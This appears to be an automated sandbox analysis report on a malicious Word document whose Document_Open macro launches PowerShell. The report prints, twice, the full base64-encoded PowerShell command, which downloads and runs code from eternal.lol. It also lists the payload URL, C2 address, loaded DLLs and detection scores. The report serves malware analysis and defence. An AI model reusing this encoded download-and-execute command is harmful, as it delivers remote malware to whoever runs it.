      Source: DUD6CqQ1Uj.docVirustotal: Detection: 62%Perma Link
      Source: DUD6CqQ1Uj.docReversingLabs: Detection: 60%
      Machine Learning detection for dropped file
      Source: C:\Users\user\Desktop\~WRD0000.tmpJoe Sandbox ML: detected
      Machine Learning detection for sample
      Source: DUD6CqQ1Uj.docJoe Sandbox ML: detected
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
      Source: Binary string: em.pdb source: powershell.exe, 00000004.00000002.12721503524.000002ADE088E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: m.pdb source: powershell.exe, 00000004.00000002.12719937739.000002ADE06B7000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior

      Software Vulnerabilities

      barindex
      Document exploit detected (process start blacklist hit)
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: global trafficDNS query: name: eternal.lol
      Source: global trafficTCP traffic: 192.168.2.24:52782 -> 192.64.119.42:443
      Source: global trafficTCP traffic: 192.168.2.24:52782 -> 192.64.119.42:443
      Source: global trafficTCP traffic: 192.168.2.24:52782 -> 192.64.119.42:443
      Source: global trafficTCP traffic: 192.168.2.24:52782 -> 192.64.119.42:443
      Source: global trafficTCP traffic: 192.168.2.24:52782 -> 192.64.119.42:443
      Source: global trafficTCP traffic: 192.168.2.24:52794 -> 192.64.119.42:443
      Source: global trafficTCP traffic: 192.168.2.24:52794 -> 192.64.119.42:443
      Source: global trafficTCP traffic: 192.168.2.24:52794 -> 192.64.119.42:443
      Source: global trafficTCP traffic: 192.168.2.24:52794 -> 192.64.119.42:443
      Source: global trafficTCP traffic: 192.168.2.24:52794 -> 192.64.119.42:443
      Source: global trafficTCP traffic: 192.168.2.24:52776 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.24:52776
      Source: global trafficTCP traffic: 192.168.2.24:52776 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.24:52776 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.24:52776
      Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.24:52776
      Source: global trafficTCP traffic: 192.168.2.24:52776 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.24:52776
      Source: global trafficTCP traffic: 192.168.2.24:52776 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.24:52782 -> 192.64.119.42:443
      Source: global trafficTCP traffic: 192.64.119.42:443 -> 192.168.2.24:52782
      Source: global trafficTCP traffic: 192.168.2.24:52782 -> 192.64.119.42:443
      Source: global trafficTCP traffic: 192.168.2.24:52782 -> 192.64.119.42:443
      Source: global trafficTCP traffic: 192.64.119.42:443 -> 192.168.2.24:52782
      Source: global trafficTCP traffic: 192.64.119.42:443 -> 192.168.2.24:52782
      Source: global trafficTCP traffic: 192.168.2.24:52782 -> 192.64.119.42:443
      Source: global trafficTCP traffic: 192.168.2.24:52782 -> 192.64.119.42:443
      Source: global trafficTCP traffic: 192.64.119.42:443 -> 192.168.2.24:52782
      Source: global trafficTCP traffic: 192.168.2.24:52794 -> 192.64.119.42:443
      Source: global trafficTCP traffic: 192.64.119.42:443 -> 192.168.2.24:52794
      Source: global trafficTCP traffic: 192.168.2.24:52794 -> 192.64.119.42:443
      Source: global trafficTCP traffic: 192.168.2.24:52794 -> 192.64.119.42:443
      Source: global trafficTCP traffic: 192.64.119.42:443 -> 192.168.2.24:52794
      Source: global trafficTCP traffic: 192.64.119.42:443 -> 192.168.2.24:52794
      Source: global trafficTCP traffic: 192.168.2.24:52794 -> 192.64.119.42:443
      Source: global trafficTCP traffic: 192.168.2.24:52794 -> 192.64.119.42:443
      Source: global trafficTCP traffic: 192.64.119.42:443 -> 192.168.2.24:52794
      Source: global trafficTCP traffic: 192.168.2.24:52776 -> 1.1.1.1:53
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: eternal.lol
      Source: powershell.exe, 00000004.00000002.12719937739.000002ADE0668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
      Source: powershell.exe, 00000004.00000002.12716256674.000002ADD85C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC8756000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC8756000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngxBX%
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC8531000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC8756000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC8756000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlxBX%
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC8531000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/PSWindows3
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC8756000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.12696586915.000002ADCA5FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/powershell51-help
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADCA5FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/powershell51-help(WZ%
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC8756000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/powershell51-helpxBX%
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC99B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.12696586915.000002ADCA0DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.12696586915.000002ADCA5FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/w
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-ps
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADCA5FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.12722139474.000002ADE0918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADCA330000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.12696586915.000002ADC99B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.12696586915.000002ADCA30A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.12696586915.000002ADC9B52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp(WZ%
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpxBX%
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pss
      Source: powershell.exe, 00000004.00000002.12716256674.000002ADD85C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000004.00000002.12716256674.000002ADD85C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000004.00000002.12716256674.000002ADD85C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC8756000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://eternal.lol
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC8531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.12696586915.000002ADC8756000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://eternal.lol/file/8e53a3e023218a9b1ef9ba1ef3b5afd191a99156b77864558d/8eef4df388f2217caec3dc26
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC8756000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC8756000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterxBX%
      Source: powershell.exe, 00000004.00000002.12716256674.000002ADD85C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: unknownNetwork traffic detected: HTTP traffic on port 52782 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52794
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52782
      Source: unknownNetwork traffic detected: HTTP traffic on port 52794 -> 443

      System Summary

      barindex
      Office process queries suspicious COM object (likely to drop second stage)
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXECOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
      Source: DUD6CqQ1Uj.docOLE, VBA macro line: Private Sub Document_Open()
      Source: ~WRD0000.tmp.0.drOLE, VBA macro line: Private Sub Document_Open()
      Source: DUD6CqQ1Uj.docOLE indicator, VBA macros: true
      Source: ~WRD0000.tmp.0.drOLE indicator, VBA macros: true
      Source: classification engineClassification label: mal96.expl.evad.winDOC@5/16@1/1
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\Desktop\~$D6CqQ1Uj.docJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{BFB6DE8C-27AF-4068-A53F-CE81F8F2E39D} - OProcSessId.datJump to behavior
      Source: DUD6CqQ1Uj.docOLE indicator, Word Document stream: true
      Source: ~WRD0000.tmp.0.drOLE indicator, Word Document stream: true
      Source: DUD6CqQ1Uj.docOLE document summary: title field not present or empty
      Source: DUD6CqQ1Uj.docOLE document summary: edited time not present or 0
      Source: ~WRD0000.tmp.0.drOLE document summary: title field not present or empty
      Source: ~WRD0000.tmp.0.drOLE document summary: edited time not present or 0
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: DUD6CqQ1Uj.docVirustotal: Detection: 62%
      Source: DUD6CqQ1Uj.docReversingLabs: Detection: 60%
      Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBlAHQAZQByAG4AYQBsAC4AbABvAGwALwBmAGkAbABlAC8AOABlADUAMwBhADMAZQAwADIAMwAyADEAOABhADkAYgAxAGUAZgA5AGIAYQAxAGUAZgAzAGIANQBhAGYAZAAxADkAMQBhADkAOQAxADUANgBiADcANwA4ADYANAA1ADUAOABkAC8AOABlAGUAZgA0AGQAZgAzADgAOABmADIAMgAxADcAYwBhAGUAYwAzAGQAYwAyADYALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA""
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBlAHQAZQByAG4AYQBsAC4AbABvAGwALwBmAGkAbABlAC8AOABlADUAMwBhADMAZQAwADIAMwAyADEAOABhADkAYgAxAGUAZgA5AGIAYQAxAGUAZgAzAGIANQBhAGYAZAAxADkAMQBhADkAOQAxADUANgBiADcANwA4ADYANAA1ADUAOABkAC8AOABlAGUAZgA0AGQAZgAzADgAOABmADIAMgAxADcAYwBhAGUAYwAzAGQAYwAyADYALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA""Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cfgmgr32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_1_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appidapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: virtdisk.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
      Source: DUD6CqQ1Uj.docInitial sample: OLE summary codepage = 1200
      Source: DUD6CqQ1Uj.docInitial sample: OLE document summary codepagedoc = 1200
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
      Source: Binary string: em.pdb source: powershell.exe, 00000004.00000002.12721503524.000002ADE088E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: m.pdb source: powershell.exe, 00000004.00000002.12719937739.000002ADE06B7000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFCC9441354 push ebx; iretd 4_2_00007FFCC944135A
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFCC9441748 push ebx; retf 4_2_00007FFCC944175A
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFCC95141A7 pushad ; iretd 4_2_00007FFCC9514311
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFCC9515186 push ss; retf 4_2_00007FFCC9515187

      Hooking and other Techniques for Hiding and Protection

      barindex
      Loading BitLocker PowerShell Module
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
